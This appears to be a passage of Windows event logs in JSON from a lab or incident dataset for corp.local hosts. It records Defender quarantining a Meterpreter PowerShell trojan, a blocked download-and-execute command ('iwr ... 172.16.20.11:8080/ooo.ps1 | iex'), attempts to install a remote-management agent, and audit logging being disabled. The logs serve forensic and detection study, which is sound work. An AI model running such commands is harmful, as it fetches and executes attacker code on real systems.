{"EventTime":"2021-09-07T11:54:52.544999+05:45","Hostname":"DC01.corp.local","Keywords":"288230376151711808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":30805,"SourceName":"Microsoft-Windows-SMBClient","ProviderGuid":"{988C59C5-0A1C-45B6-A555-0C62276E327D}","Version":2,"TaskValue":0,"OpcodeValue":0,"RecordNumber":1284,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Microsoft-Windows-SmbClient/Connectivity","Message":"The client lost its session to the server.\r\n\r\nError: The transport connection is now disconnected.\r\n\r\nServer name: \\winserver2019\r\nSession ID: 0xA40000000035\r\n\r\nGuidance:\r\nIf the server is a Windows Failover Cluster file server, then this message occurs when the file share moves between cluster nodes. There should also be an anti-event 30806 indicating the session to the server was re-established. If the server is not a failover cluster, it is likely that the server was previously online, but it is now inaccessible over the network.","Opcode":"Info","Status":"3221225996","SessionId":"180319906955317","TreeId":"0","ServerNameLength":"14","ServerName":"\\winserver2019","AddressLength":"0","EventReceivedTime":"2021-09-07T11:54:54.310823+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-06T13:23:16.289377+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":8230,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":68338,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The rules engine successfully re-evaluated the schedule.\r\nKernel policies:\r\nSecurity-SPP-Action-StateData (REG_SZ) =AppId=55c92734-d682-4d71-983e-d6ec3f16059f;GraceEndDate=2021/10/06:07:38:15;LastConsumptionReason=0x4004f040;LastNotificationId=VolumeRenewalRequired;LicenseState=SL_LICENSING_STATUS_LICENSED;PartialProductKey=T83GX;ProductKeyType=Volume:GVLK;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;ruleId=502ff3ba-669a-4674-bbb1-601f34a3b968;uxDifferentiator=ENVIRONMENT;volumeActivationOrder=normal","Data":"Security-SPP-Action-StateData (REG_SZ) =AppId=55c92734-d682-4d71-983e-d6ec3f16059f;GraceEndDate=2021/10/06:07:38:15;LastConsumptionReason=0x4004f040;LastNotificationId=VolumeRenewalRequired;LicenseState=SL_LICENSING_STATUS_LICENSED;PartialProductKey=T83GX;ProductKeyType=Volume:GVLK;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;ruleId=502ff3ba-669a-4674-bbb1-601f34a3b968;uxDifferentiator=ENVIRONMENT;volumeActivationOrder=normal","EventReceivedTime":"2021-09-06T13:23:17.021948+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-04T08:44:51.416700+05:45","Hostname":"DC01.corp.local","Keywords":"288230376151711808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":30808,"SourceName":"Microsoft-Windows-SMBClient","ProviderGuid":"{988C59C5-0A1C-45B6-A555-0C62276E327D}","Version":2,"TaskValue":0,"OpcodeValue":0,"RecordNumber":1279,"ExecutionProcessID":4,"ExecutionThreadID":5752,"Channel":"Microsoft-Windows-SmbClient/Connectivity","Message":"The connection to the share was re-established.\r\n\r\nShare name: \\corp.local\\IPC$\r\nServer address: 192.168.2.47:445\r\nSession ID: 0x1480BF8000025\r\nTree ID: 0x1\r\n\r\nGuidance:\r\nYou should expect this event if there was a previous event 30807, but the client successfully resumed the cached connection before the timeout expired.","Opcode":"Info","Status":"0","SessionId":"360691219300389","TreeId":"1","ServerNameLength":"25","ServerName":"\\corp.local\\IPC$","AddressLength":"16","Address":"020001BDC0A8022F0000000000000000","EventReceivedTime":"2021-09-04T08:44:52.822920+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-04T08:44:51.416700+05:45","Hostname":"DC01.corp.local","Keywords":"288230376151711808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":30806,"SourceName":"Microsoft-Windows-SMBClient","ProviderGuid":"{988C59C5-0A1C-45B6-A555-0C62276E327D}","Version":2,"TaskValue":0,"OpcodeValue":0,"RecordNumber":1278,"ExecutionProcessID":4,"ExecutionThreadID":3104,"Channel":"Microsoft-Windows-SmbClient/Connectivity","Message":"The client re-established its session to the server.\r\n\r\nServer name: \\corp.local\r\nServer address: 192.168.2.47:445\r\nSession ID: 0x1480BF8000025\r\n\r\nGuidance:\r\nYou should expect this event if there was a previous event 30805, but the client successfully resumed the cached connection before the timeout expired.","Opcode":"Info","Status":"0","SessionId":"360691219300389","TreeId":"0","ServerNameLength":"20","ServerName":"\\corp.local","AddressLength":"16","Address":"020001BDC0A8022F0000000000000000","EventReceivedTime":"2021-09-04T08:44:52.822920+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-02T13:13:13.952126+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":1116,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":21975,"ExecutionProcessID":6828,"ExecutionThreadID":5740,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus has detected malware or other potentially unwanted software.\r\n For more information please see the following:\r\nhttps://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Meterpreter.gen!A&threatid=2147727753&enterprise=0\r\n \tName: Trojan:PowerShell/Meterpreter.gen!A\r\n \tID: 2147727753\r\n \tSeverity: Severe\r\n \tCategory: Trojan\r\n \tPath: amsi:_C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\n \tDetection Origin: Unknown\r\n \tDetection Type: Concrete\r\n \tDetection Source: AMSI\r\n \tUser: CORP\\Leo\r\n \tProcess Name: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\n \tSecurity intelligence Version: AV: 1.347.844.0, AS: 1.347.844.0, NIS: 1.347.844.0\r\n \tEngine Version: AM: 1.1.18400.5, NIS: 1.1.18400.5","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2107.4","Detection ID":"{FAA23698-A60C-4DE2-AC6E-8E5D5827CB2F}","Detection Time":"2021-09-02T07:26:08.733Z","Threat ID":"2147727753","Threat Name":"Trojan:PowerShell/Meterpreter.gen!A","Severity ID":"5","Severity Name":"Severe","Category ID":"8","Category Name":"Trojan","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Meterpreter.gen!A&threatid=2147727753&enterprise=0","Status Code":"1","State":"1","Source ID":"10","Source Name":"AMSI","Process 
Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Detection User":"CORP\\Leo","Path":"amsi:_C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Origin ID":"0","Origin Name":"Unknown","Execution ID":"1","Execution Name":"Suspended","Type ID":"0","Type Name":"Concrete","Pre Execution Status":"0","Action ID":"9","Action Name":"Not Applicable","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Post Clean Status":"0","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Security intelligence Version":"AV: 1.347.844.0, AS: 1.347.844.0, NIS: 1.347.844.0","Engine Version":"AM: 1.1.18400.5, NIS: 1.1.18400.5","EventReceivedTime":"2021-09-02T13:13:15.965845+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-02T13:15:46.054286+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1117,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":21976,"ExecutionProcessID":6828,"ExecutionThreadID":5740,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software.\r\n For more information please see the following:\r\nhttps://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Meterpreter.gen!A&threatid=2147727753&enterprise=0\r\n \tName: Trojan:PowerShell/Meterpreter.gen!A\r\n \tID: 2147727753\r\n \tSeverity: Severe\r\n \tCategory: Trojan\r\n \tPath: amsi:_C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\n \tDetection Origin: Unknown\r\n \tDetection Type: Concrete\r\n \tDetection Source: AMSI\r\n \tUser: NT AUTHORITY\\SYSTEM\r\n \tProcess Name: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\n \tAction: Quarantine\r\n \tAction Status: No additional actions required\r\n \tError Code: 0x00000000\r\n \tError description: The operation completed successfully. 
\r\n \tSecurity intelligence Version: AV: 1.347.844.0, AS: 1.347.844.0, NIS: 1.347.844.0\r\n \tEngine Version: AM: 1.1.18400.5, NIS: 1.1.18400.5","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2107.4","Detection ID":"{FAA23698-A60C-4DE2-AC6E-8E5D5827CB2F}","Detection Time":"2021-09-02T07:26:08.733Z","Threat ID":"2147727753","Threat Name":"Trojan:PowerShell/Meterpreter.gen!A","Severity ID":"5","Severity Name":"Severe","Category ID":"8","Category Name":"Trojan","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Meterpreter.gen!A&threatid=2147727753&enterprise=0","Status Code":"3","State":"2","Source ID":"10","Source Name":"AMSI","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Detection User":"CORP\\Leo","Path":"amsi:_C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Origin ID":"0","Origin Name":"Unknown","Execution ID":"1","Execution Name":"Suspended","Type ID":"0","Type Name":"Concrete","Pre Execution Status":"3","Action ID":"2","Action Name":"Quarantine","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Post Clean Status":"0","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Remediation User":"NT AUTHORITY\\SYSTEM","Security intelligence Version":"AV: 1.347.844.0, AS: 1.347.844.0, NIS: 1.347.844.0","Engine Version":"AM: 1.1.18400.5, NIS: 1.1.18400.5","EventReceivedTime":"2021-09-02T13:15:47.635520+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-02T13:11:08.757793+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":200,"SourceName":"PowerShell","Version":0,"TaskValue":2,"OpcodeValue":0,"RecordNumber":2055382,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Windows PowerShell","Message":"Command Health: At line:1 char:1\r\n+ $CbLxFVptxxRR = @\"\r\n+ ~~~~~~~~~~~~~~~~~~\nThis script contains malicious content and has been blocked by your antivirus software.. \r\n\r\nDetails: \r\n\tExceptionClass=CmdletInvocationException\r\n\tErrorCategory=ParserError\r\n\tErrorId=ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand\r\n\tErrorMessage=At line:1 char:1\r\n+ $CbLxFVptxxRR = @\"\r\n+ ~~~~~~~~~~~~~~~~~~\nThis script contains malicious content and has been blocked by your antivirus software.\r\n\r\n\tSeverity=Warning\r\n\r\n\tSequenceNumber=50\r\n\r\n\tHostName=ConsoleHost\r\n\tHostVersion=5.1.19041.868\r\n\tHostId=ff2e10a3-42e6-4e79-9e1a-e177dbb1d275\r\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\n\tEngineVersion=5.1.19041.868\r\n\tRunspaceId=42bdd659-9cf6-41ff-a878-8eeea3dd119f\r\n\tPipelineId=7\r\n\tCommandName=Invoke-Expression\r\n\tCommandType=Cmdlet\r\n\tScriptName=\r\n\tCommandPath=\r\n\tCommandLine=iwr -useb 172.16.20.11:8080/ooo.ps1 | iex","Category":"Command Health","Opcode":"Info","Data":"At line:1 char:1\n+ $CbLxFVptxxRR = @\"\n+ ~~~~~~~~~~~~~~~~~~\nThis script contains malicious content and has been blocked by your antivirus software.","Data_1":"\tExceptionClass=CmdletInvocationException\n\tErrorCategory=ParserError\n\tErrorId=ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand\n\tErrorMessage=At line:1 char:1\n+ $CbLxFVptxxRR = @\"\n+ ~~~~~~~~~~~~~~~~~~\nThis script contains malicious content and has been blocked by your antivirus 
software.\n\n\tSeverity=Warning\n\n\tSequenceNumber=50\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.19041.868\n\tHostId=ff2e10a3-42e6-4e79-9e1a-e177dbb1d275\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n\tEngineVersion=5.1.19041.868\n\tRunspaceId=42bdd659-9cf6-41ff-a878-8eeea3dd119f\n\tPipelineId=7\n\tCommandName=Invoke-Expression\n\tCommandType=Cmdlet\n\tScriptName=\n\tCommandPath=\n\tCommandLine=iwr -useb 172.16.20.11:8080/ooo.ps1 | iex","EventReceivedTime":"2021-09-02T13:11:09.565762+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-01T10:43:05.098665+05:45","Hostname":"IT03.corp.local","Keywords":"9259400833873739776","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":4109,"SourceName":"Microsoft-Windows-CAPI2","ProviderGuid":"{5BBCA4A8-B209-48DC-A8C7-B23D3E5216FB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":27477,"ExecutionProcessID":2488,"ExecutionThreadID":3688,"Channel":"Application","Message":"Successful auto property update of third-party root certificate:: Subject: <CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US> Sha1 thumbprint: <DF3C24F9BFD666761B268073FE06D1CC8D4F82A4>.","Opcode":"Info","EventData":"<Data>CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US</Data><Data>DF3C24F9BFD666761B268073FE06D1CC8D4F82A4</Data>","EventReceivedTime":"2021-09-01T10:43:06.379915+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-01T14:55:52.680911+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11708,"SourceName":"MsiInstaller","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":67802,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Product: AteraAgent -- Installation failed.","Opcode":"Info","Data":"Product: AteraAgent -- Installation failed.","Data_1":"(NULL)","Data_2":"(NULL)","Data_3":"(NULL)","Data_4":"(NULL)","Data_5":"(NULL)","EventData.Binary":"7B39313835344637322D323741312D343044412D413732352D4433353137453132374330447D","EventReceivedTime":"2021-09-01T14:55:53.556058+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-01T14:55:52.525175+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":11925,"SourceName":"MsiInstaller","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":67801,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Product: AteraAgent -- Error 1925. You do not have sufficient privileges to complete this installation for all users of the machine. Log on as administrator and then retry this installation.","Opcode":"Info","Data":"Product: AteraAgent -- Error 1925. You do not have sufficient privileges to complete this installation for all users of the machine. Log on as administrator and then retry this installation.","Data_1":"(NULL)","Data_2":"(NULL)","Data_3":"(NULL)","Data_4":"(NULL)","Data_5":"(NULL)","EventData.Binary":"7B39313835344637322D323741312D343044412D413732352D4433353137453132374330447D","EventReceivedTime":"2021-09-01T14:55:52.555885+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-01T15:57:02.742787+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10003,"SourceName":"Microsoft-Windows-RestartManager","ProviderGuid":"{0888E5EF-9B98-4695-979D-E92CE4247224}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":67840,"ExecutionProcessID":4756,"ExecutionThreadID":7344,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Restarting application or service 'AteraAgent'.","Opcode":"Info","RmApplicationEvent.RmSessionId":"0","RmApplicationEvent.FullPath":"AteraAgent.exe","RmApplicationEvent.DisplayName":"AteraAgent","RmApplicationEvent.AppVersion":"0","RmApplicationEvent.AppType":"3","RmApplicationEvent.TSSessionId":"0","RmApplicationEvent.Status":"262155","RmApplicationEvent.Pid":"9828","RmApplicationEvent.nFiles":"0","EventReceivedTime":"2021-09-01T15:57:04.285588+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-01T16:00:38.158698+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":1026,"SourceName":".NET Runtime","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":67848,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"Application: AgentPackageTicketing.exe\nFramework Version: v4.0.30319\nDescription: The process was terminated due to an unhandled exception.\nException Info: System.IO.FileNotFoundException\n at AgentPackageTicketing.DownloadAndUnzipNuget.ExtractZipFile(System.IO.MemoryStream, System.String)\n at AgentPackageTicketing.DownloadAndUnzipNuget.Run()\n at AgentPackageTicketing.Program.Main(System.String[])\n\n","Opcode":"Info","Data":"Application: AgentPackageTicketing.exe\nFramework Version: v4.0.30319\nDescription: The process was terminated due to an unhandled exception.\nException Info: System.IO.FileNotFoundException\n at AgentPackageTicketing.DownloadAndUnzipNuget.ExtractZipFile(System.IO.MemoryStream, System.String)\n at AgentPackageTicketing.DownloadAndUnzipNuget.Run()\n at AgentPackageTicketing.Program.Main(System.String[])\n\n","EventReceivedTime":"2021-09-01T16:00:39.096203+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-27T13:03:47.002016+05:45","Hostname":"IT01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5156,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12810,"OpcodeValue":0,"RecordNumber":4025408,"ExecutionProcessID":4,"ExecutionThreadID":2580,"Channel":"Security","Message":"The Windows Filtering Platform has permitted a connection.\r\n\r\nApplication Information:\r\n\tProcess ID:\t\t2316\r\n\tApplication Name:\t\\device\\harddiskvolume2\\program files\\nxlog\\nxlog.exe\r\n\r\nNetwork Information:\r\n\tDirection:\t\tOutbound\r\n\tSource Address:\t\t192.168.2.46\r\n\tSource Port:\t\t49694\r\n\tDestination Address:\t192.168.4.132\r\n\tDestination Port:\t\t514\r\n\tProtocol:\t\t6\r\n\r\nFilter Information:\r\n\tFilter Run-Time ID:\t82874\r\n\tLayer Name:\t\tConnect\r\n\tLayer Run-Time ID:\t48","Category":"Filtering Platform Connection","Opcode":"Info","ProcessID":"2316","Application":"\\device\\harddiskvolume2\\program files\\nxlog\\nxlog.exe","Direction":"%%14593","SourceAddress":"192.168.2.46","SourcePort":"49694","DestAddress":"192.168.4.132","DestPort":"514","Protocol":"6","FilterRTID":"82874","LayerName":"%%14611","LayerRTID":"48","RemoteUserID":"S-1-0-0","RemoteMachineID":"S-1-0-0","EventReceivedTime":"2021-08-27T13:03:56.670598+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-27T13:03:47.099771+05:45","Hostname":"IT01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5158,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12810,"OpcodeValue":0,"RecordNumber":4025478,"ExecutionProcessID":4,"ExecutionThreadID":2580,"Channel":"Security","Message":"The Windows Filtering Platform has permitted a bind to a local port.\r\n\r\nApplication Information:\r\n\tProcess ID:\t\t376\r\n\tApplication Name:\t\\device\\harddiskvolume2\\windows\\system32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tSource Address:\t\t0.0.0.0\r\n\tSource Port:\t\t49887\r\n\tProtocol:\t\t6\r\n\r\nFilter Information:\r\n\tFilter Run-Time ID:\t0\r\n\tLayer Name:\t\tResource Assignment\r\n\tLayer Run-Time ID:\t36","Category":"Filtering Platform Connection","Opcode":"Info","ProcessId":"376","Application":"\\device\\harddiskvolume2\\windows\\system32\\svchost.exe","SourceAddress":"0.0.0.0","SourcePort":"49887","Protocol":"6","FilterRTID":"0","LayerName":"%%14608","LayerRTID":"36","EventReceivedTime":"2021-08-27T13:03:56.811213+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-27T11:50:56.358840+05:45","Hostname":"IT01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5154,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12810,"OpcodeValue":0,"RecordNumber":1080407,"ExecutionProcessID":4,"ExecutionThreadID":2580,"Channel":"Security","Message":"The Windows Filtering Platform has permitted an application or service to listen on a port for incoming connections.\r\n\r\nApplication Information:\r\n\tProcess ID:\t\t3736\r\n\tApplication Name:\t\\device\\harddiskvolume2\\windows\\system32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tSource Address:\t\t::\r\n\tSource Port:\t\t7680\r\n\tProtocol:\t\t6\r\n\r\nFilter Information:\r\n\tFilter Run-Time ID:\t82911\r\n\tLayer Name:\t\tListen\r\n\tLayer Run-Time ID:\t42","Category":"Filtering Platform Connection","Opcode":"Info","ProcessId":"3736","Application":"\\device\\harddiskvolume2\\windows\\system32\\svchost.exe","SourceAddress":"::","SourcePort":"7680","Protocol":"6","FilterRTID":"82911","LayerName":"%%14609","LayerRTID":"42","EventReceivedTime":"2021-08-27T11:51:02.183961+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-27T13:03:47.689751+05:45","Hostname":"IT01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4719,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13568,"OpcodeValue":0,"RecordNumber":4025734,"ActivityID":"{EB507E61-9B07-0001-E57E-50EB079BD701}","ExecutionProcessID":664,"ExecutionThreadID":5660,"Channel":"Security","Message":"System audit policy was changed.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nAudit Policy Change:\r\n\tCategory:\t\tObject Access\r\n\tSubcategory:\t\tFiltering Platform Connection\r\n\tSubcategory GUID:\t{0cce9226-69ae-11d9-bed3-505054503030}\r\n\tChanges:\t\tSuccess removed, Failure removed","Category":"Audit Policy Change","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT01$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","CategoryId":"%%8274","SubcategoryId":"%%12810","SubcategoryGuid":"{0cce9226-69ae-11d9-bed3-505054503030}","AuditPolicyChanges":"%%8448, %%8450","EventReceivedTime":"2021-08-27T13:03:57.170570+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-27T13:57:19.612056+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5,"SourceName":"Microsoft-Windows-Bits-Client","ProviderGuid":"{EF1CC15B-46C1-414E-BB95-E76B077BD51E}","Version":1,"TaskValue":0,"OpcodeValue":0,"RecordNumber":4487,"ExecutionProcessID":376,"ExecutionThreadID":268,"Channel":"Microsoft-Windows-Bits-Client/Operational","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Job cancelled. User: CORP\\Leo, job: FontUpdates, jobID: {463719c1-b25d-4b8f-b4a1-525dad474fe4}, owner: CORP\\Leo, filecount: 1","Opcode":"Info","User":"CORP\\Leo","jobTitle":"FontUpdates","jobId":"{463719c1-b25d-4b8f-b4a1-525dad474fe4}","jobOwner":"CORP\\Leo","fileCount":"1","EventReceivedTime":"2021-08-27T13:57:20.754237+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-27T14:39:14.153219+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":142,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":15,"RecordNumber":23447,"ActivityID":"{F420ABE0-482B-4478-B140-1FFFC2130000}","ExecutionProcessID":444,"ExecutionThreadID":3120,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"TCP socket READ operation failed, error 121","Category":"RemoteFX module","Opcode":"EstablishConnection","error":"121","EventReceivedTime":"2021-08-27T14:39:15.558337+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-27T14:39:14.153126+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":226,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":19,"RecordNumber":23446,"ActivityID":"{F420ABE0-482B-4478-B140-1FFFC2130000}","ExecutionProcessID":444,"ExecutionThreadID":3256,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"RDP_TCP: An error was encountered when transitioning from StateUnknown in response to Event_Disconnect (error code 0x80070079).","Category":"RemoteFX module","Opcode":"Runtime","StateTransition":"RDP_TCP","PreviousState":"23","PreviousStateName":"StateUnknown","NewState":"21","NewStateName":"StateDisconnected","Event":"43","EventName":"Event_Disconnect","ErrorCode":"0x80070079","EventReceivedTime":"2021-08-27T14:39:15.542661+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-26T13:44:10.000000+05:45","Hostname":"DC01.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5186,"SourceName":"Microsoft-Windows-WAS","ProviderGuid":"{524B5D04-133C-4A62-8362-64E8EDB9CE40}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":643688,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"A worker process with process id of '4960' serving application pool 'DefaultAppPool' was shutdown due to inactivity. Application Pool timeout configuration was set to 20 minutes. A new worker process will be started when needed.","ProcessID":"4960","AppPoolID":"DefaultAppPool","Minutes":"20","EventReceivedTime":"2021-08-26T13:44:10.292665+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-24T18:42:51.088417+05:45","Hostname":"IT01.corp.local","Keywords":"9227875636482146304","EventType":"AUDIT_FAILURE","SeverityValue":4,"Severity":"ERROR","EventID":5157,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12810,"OpcodeValue":0,"RecordNumber":669153,"ExecutionProcessID":4,"ExecutionThreadID":3572,"Channel":"Security","Message":"The Windows Filtering Platform has blocked a connection.\r\n\r\nApplication Information:\r\n\tProcess ID:\t\t1188\r\n\tApplication Name:\t\\device\\harddiskvolume2\\windows\\system32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tDirection:\t\tOutbound\r\n\tSource Address:\t\t192.168.2.46\r\n\tSource Port:\t\t51163\r\n\tDestination Address:\t45.64.115.163\r\n\tDestination Port:\t\t80\r\n\tProtocol:\t\t6\r\n\r\nFilter Information:\r\n\tFilter Run-Time 